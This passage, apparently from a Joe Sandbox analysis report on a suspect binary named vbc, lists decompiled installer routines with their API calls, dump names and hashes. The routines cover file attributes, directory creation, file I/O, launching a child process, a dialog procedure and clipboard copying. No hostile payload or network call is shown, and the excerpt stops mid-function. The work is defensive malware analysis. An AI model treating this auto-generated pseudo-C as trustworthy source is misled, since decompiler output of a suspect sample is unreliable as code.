          • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
          • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
          • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00405C1C(WCHAR* _a4) {
          				int _t2;
          
          				_t2 = CreateDirectoryW(_a4, 0); // executed
          				if(_t2 == 0) {
          					return GetLastError();
          				}
          				return 0;
          			}




          0x00405c22
          0x00405c2a
          0x00000000
          0x00405c30
          0x00000000

          APIs
          • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
          • GetLastError.KERNEL32 ref: 00405C30
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CreateDirectoryErrorLast
          • String ID:
          • API String ID: 1375471231-0
          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
          • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
          • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00406210(void* _a4, void* _a8, long _a12) {
          				int _t7;
          				long _t11;
          
          				_t11 = _a12;
          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
          				if(_t7 == 0 || _t11 != _a12) {
          					return 0;
          				} else {
          					return 1;
          				}
          			}





          0x00406214
          0x00406224
          0x0040622c
          0x00000000
          0x00406233
          0x00000000
          0x00406235

          APIs
          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
          • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
          • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004061E1(void* _a4, void* _a8, long _a12) {
          				int _t7;
          				long _t11;
          
          				_t11 = _a12;
          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
          				if(_t7 == 0 || _t11 != _a12) {
          					return 0;
          				} else {
          					return 1;
          				}
          			}





          0x004061e5
          0x004061f5
          0x004061fd
          0x00000000
          0x00406204
          0x00000000
          0x00406206

          APIs
          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
          • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
          • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004035FE(long _a4) {
          				long _t2;
          
          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
          				return _t2;
          			}




          0x0040360c
          0x00403612

          APIs
          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 78%
          			E00401FA4() {
          				void* _t9;
          				intOrPtr _t13;
          				void* _t15;
          				void* _t17;
          				void* _t20;
          				void* _t22;
          
          				_t19 = E00402DA6(_t15);
          				E004056D0(0xffffffeb, _t7);
          				_t9 = E00405C51(_t19); // executed
          				_t20 = _t9;
          				if(_t20 == _t15) {
          					 *((intOrPtr*)(_t22 - 4)) = 1;
          				} else {
          					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
          						_t13 = E00406AE6(_t17, _t20); // executed
          						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
          							if(_t13 != _t15) {
          								 *((intOrPtr*)(_t22 - 4)) = 1;
          							}
          						} else {
          							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
          						}
          					}
          					_push(_t20);
          					CloseHandle();
          				}
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
          				return 0;
          			}









          0x00401faa
          0x00401faf
          0x00401fb5
          0x00401fba
          0x00401fbe
          0x0040292e
          0x00401fc4
          0x00401fc7
          0x00401fca
          0x00401fd2
          0x00401fe1
          0x00401fe3
          0x00401fe3
          0x00401fd4
          0x00401fd8
          0x00401fd8
          0x00401fd2
          0x00401fea
          0x00401feb
          0x00401feb
          0x00402c2d
          0x00402c39

          APIs
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
            • Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
            • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
          • CloseHandle.KERNEL32(?), ref: 00401FEB
            • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
            • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
          • String ID:
          • API String ID: 2972824698-0
          • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
          • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
          • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
          • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
          				struct HWND__* _v8;
          				long _v12;
          				struct tagRECT _v28;
          				void* _v36;
          				signed int _v40;
          				int _v44;
          				int _v48;
          				signed int _v52;
          				int _v56;
          				void* _v60;
          				void* _v68;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				struct HWND__* _t94;
          				long _t95;
          				int _t100;
          				void* _t108;
          				intOrPtr _t130;
          				struct HWND__* _t134;
          				int _t156;
          				int _t159;
          				struct HMENU__* _t164;
          				struct HWND__* _t168;
          				struct HWND__* _t169;
          				int _t171;
          				void* _t172;
          				short* _t173;
          				short* _t175;
          				int _t177;
          
          				_t169 =  *0x7a7a84;
          				_t156 = 0;
          				_v8 = _t169;
          				if(_a8 != 0x110) {
          					if(_a8 == 0x405) {
          						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
          					}
          					if(_a8 != 0x111) {
          						L17:
          						_t171 = 1;
          						if(_a8 != 0x404) {
          							L25:
          							if(_a8 != 0x7b) {
          								goto L20;
          							}
          							_t94 = _v8;
          							if(_a12 != _t94) {
          								goto L20;
          							}
          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
          							_a8 = _t95;
          							if(_t95 <= _t156) {
          								L36:
          								return 0;
          							}
          							_t164 = CreatePopupMenu();
          							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
          							_t100 = _a16;
          							_t159 = _a16 >> 0x10;
          							if(_a16 == 0xffffffff) {
          								GetWindowRect(_v8,  &_v28);
          								_t100 = _v28.left;
          								_t159 = _v28.top;
          							}
          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
          								_v60 = _t156;
          								_v48 = 0x7a1f88;
          								_v44 = 0x1000;
          								_a4 = _a8;
          								do {
          									_a4 = _a4 - 1;
          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
          								} while (_a4 != _t156);
          								OpenClipboard(_t156);
          								EmptyClipboard();
          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
          								_a4 = _t108;
          								_t172 = GlobalLock(_t108);
          								do {
          									_v48 = _t172;
          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
          									 *_t173 = 0xd;
          									_t175 = _t173 + 2;
          									 *_t175 = 0xa;
          									_t172 = _t175 + 2;
          									_t156 = _t156 + 1;
          								} while (_t156 < _a8);
          								GlobalUnlock(_a4);
          								SetClipboardData(0xd, _a4);
          								CloseClipboard();
          							}
          							goto L36;
          						}
          						if( *0x7a7a6c == _t156) {
          							ShowWindow( *0x7a8aa8, 8);
          							if( *0x7a8b2c == _t156) {
          								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
          							}
          							E004045A3(_t171);
          							goto L25;
          						}
          						 *0x7a0758 = 2;
          						E004045A3(0x78);
          						goto L20;
          					} else {
          						if(_a12 != 0x403) {
          							L20:
          							return E00404631(_a8, _a12, _a16);
          						}
          						ShowWindow( *0x7a7a70, _t156);
          						ShowWindow(_t169, 8);
          						E004045FF(_t169);
          						goto L17;
          					}
          				}
          				_v52 = _v52 | 0xffffffff;
          				_v40 = _v40 | 0xffffffff;
          				_t177 = 2;
          				_v60 = _t177;
          				_v56 = 0;
          				_v48 = 0;
          				_v44 = 0;
          				asm("stosd");
          				asm("stosd");
          				_t130 =  *0x7a8ab0;
          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
          				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
          				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
          				_t134 = GetDlgItem(_a4, 0x3f8);
          				 *0x7a7a84 = _t134;
          				_v8 = _t134;
          				E004045FF( *0x7a7a70);
          				 *0x7a7a74 = E00404F58(4);
          				 *0x7a7a8c = 0;
          				GetClientRect(_v8,  &_v28);
          				_v52 = _v28.right - GetSystemMetrics(_t177);
          				SendMessageW(_v8, 0x1061, 0,  &_v60);
          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
          				if(_a8 >= 0) {
          					SendMessageW(_v8, 0x1001, 0, _a8);
          					SendMessageW(_v8, 0x1026, 0, _a8);
          				}
          				if(_a12 >= _t156) {
          					SendMessageW(_v8, 0x1024, _t156, _a12);
          				}
          				_push( *((intOrPtr*)(_a16 + 0x30)));
          				_push(0x1b);
          				E004045CA(_a4);
          				if(( *0x7a8ab8 & 0x00000003) != 0) {
          					ShowWindow( *0x7a7a70, _t156);
          					if(( *0x7a8ab8 & 0x00000002) != 0) {
          						 *0x7a7a70 = _t156;
          					} else {
          						ShowWindow(_v8, 8);
          					}
          					E004045FF( *0x7a7a68);
          				}
          				_t168 = GetDlgItem(_a4, 0x3ec);
          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
          				if(( *0x7a8ab8 & 0x00000004) != 0) {
          					SendMessageW(_t168, 0x409, _t156, _a12);
          					SendMessageW(_t168, 0x2001, _t156, _a8);
          				}
          				goto L36;
          			}

































          0x00405817
          0x0040581d
          0x00405827
          0x0040582a
          0x004059c0
          0x004059e4
          0x004059e4
          0x004059f7
          0x00405a15
          0x00405a17
          0x00405a1f
          0x00405a75
          0x00405a79
          0x00000000
          0x00000000
          0x00405a7b
          0x00405a81
          0x00000000
          0x00000000
          0x00405a8b
          0x00405a93
          0x00405a96
          0x00405b98
          0x00000000
          0x00405b98
          0x00405aa5
          0x00405ab0
          0x00405ab9
          0x00405ac4
          0x00405ac7
          0x00405ad0
          0x00405ad6
          0x00405ad9
          0x00405ad9
          0x00405af1
          0x00405afa
          0x00405afd
          0x00405b04
          0x00405b0b
          0x00405b13
          0x00405b13
          0x00405b2a
          0x00405b2a
          0x00405b31
          0x00405b37
          0x00405b43
          0x00405b4a
          0x00405b53
          0x00405b55
          0x00405b58
          0x00405b67
          0x00405b6a
          0x00405b70
          0x00405b71
          0x00405b77
          0x00405b78
          0x00405b79
          0x00405b81
          0x00405b8c
          0x00405b92
          0x00405b92
          0x00000000
          0x00405af1
          0x00405a27
          0x00405a57
          0x00405a5f
          0x00405a6a
          0x00405a6a
          0x00405a70
          0x00000000
          0x00405a70
          0x00405a2b
          0x00405a35
          0x00000000
          0x004059f9
          0x004059ff
          0x00405a3a
          0x00000000
          0x00405a43
          0x00405a08
          0x00405a0d
          0x00405a10
          0x00000000
          0x00405a10
          0x004059f7
          0x00405830
          0x00405834
          0x0040583c
          0x00405840
          0x00405843
          0x00405846
          0x00405849
          0x0040584c
          0x0040584d
          0x0040584e
          0x00405867
          0x0040586a
          0x00405874
          0x00405883
          0x0040588b
          0x00405893
          0x00405898
          0x0040589b
          0x004058a7
          0x004058b0
          0x004058b9
          0x004058db
          0x004058e1
          0x004058f2
          0x004058f7
          0x00405905
          0x00405913
          0x00405913
          0x00405918
          0x00405926
          0x00405926
          0x0040592b
          0x0040592e
          0x00405933
          0x0040593f
          0x00405948
          0x00405955
          0x00405964
          0x00405957
          0x0040595c
          0x0040595c
          0x00405970
          0x00405970
          0x00405984
          0x0040598d
          0x00405996
          0x004059a6
          0x004059b2
          0x004059b2
          0x00000000

          APIs
          • GetDlgItem.USER32(?,00000403), ref: 0040586D
          • GetDlgItem.USER32(?,000003EE), ref: 0040587C
          • GetClientRect.USER32 ref: 004058B9
          • GetSystemMetrics.USER32 ref: 004058C0
          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
          • ShowWindow.USER32(00000000,?), ref: 00405948
          • ShowWindow.USER32(?,00000008), ref: 0040595C
          • GetDlgItem.USER32(?,000003EC), ref: 0040597D
          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
          • GetDlgItem.USER32(?,000003F8), ref: 0040588B
            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
          • GetDlgItem.USER32(?,000003EC), ref: 004059CF
          • CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
          • CloseHandle.KERNEL32(00000000), ref: 004059E4
          • ShowWindow.USER32(00000000), ref: 00405A08
          • ShowWindow.USER32(?,00000008), ref: 00405A0D
          • ShowWindow.USER32(00000008), ref: 00405A57
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
          • CreatePopupMenu.USER32 ref: 00405A9C
          • AppendMenuW.USER32 ref: 00405AB0
          • GetWindowRect.USER32(?,?), ref: 00405AD0
          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
          • OpenClipboard.USER32(00000000), ref: 00405B31
          • EmptyClipboard.USER32 ref: 00405B37
          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
          • GlobalLock.KERNEL32 ref: 00405B4D
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
          • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
          • SetClipboardData.USER32 ref: 00405B8C
          • CloseClipboard.USER32 ref: 00405B92
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
          • String ID: {
          • API String ID: 590372296-366298937
          • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
          • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
          • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
          • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 78%
          			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
          				signed int _v8;
          				signed int _v12;
          				long _v16;
          				long _v20;
          				long _v24;
          				char _v28;
          				intOrPtr _v32;
          				long _v36;
          				char _v40;
          				unsigned int _v44;
          				signed int _v48;
          				WCHAR* _v56;
          				intOrPtr _v60;
          				intOrPtr _v64;
          				intOrPtr _v68;
          				WCHAR* _v72;
          				void _v76;
          				struct HWND__* _v80;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				intOrPtr _t82;
          				long _t87;
          				short* _t89;
          				void* _t95;
          				signed int _t96;
          				int _t109;
          				signed short _t114;
          				signed int _t118;
          				struct HWND__** _t122;
          				intOrPtr* _t138;
          				WCHAR* _t146;
          				unsigned int _t150;
          				signed int _t152;
          				unsigned int _t156;
          				signed int _t158;
          				signed int* _t159;
          				signed int* _t160;
          				struct HWND__* _t166;
          				struct HWND__* _t167;
          				int _t169;
          				unsigned int _t197;
          
          				_t156 = __edx;
          				_t82 =  *0x7a0f60;
          				_v32 = _t82;
          				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
          				if(_a8 == 0x40b) {
          					E00405CB2(0x3fb, _t146);
          					E004068F5(_t146);
          				}
          				_t167 = _a4;
          				if(_a8 != 0x110) {
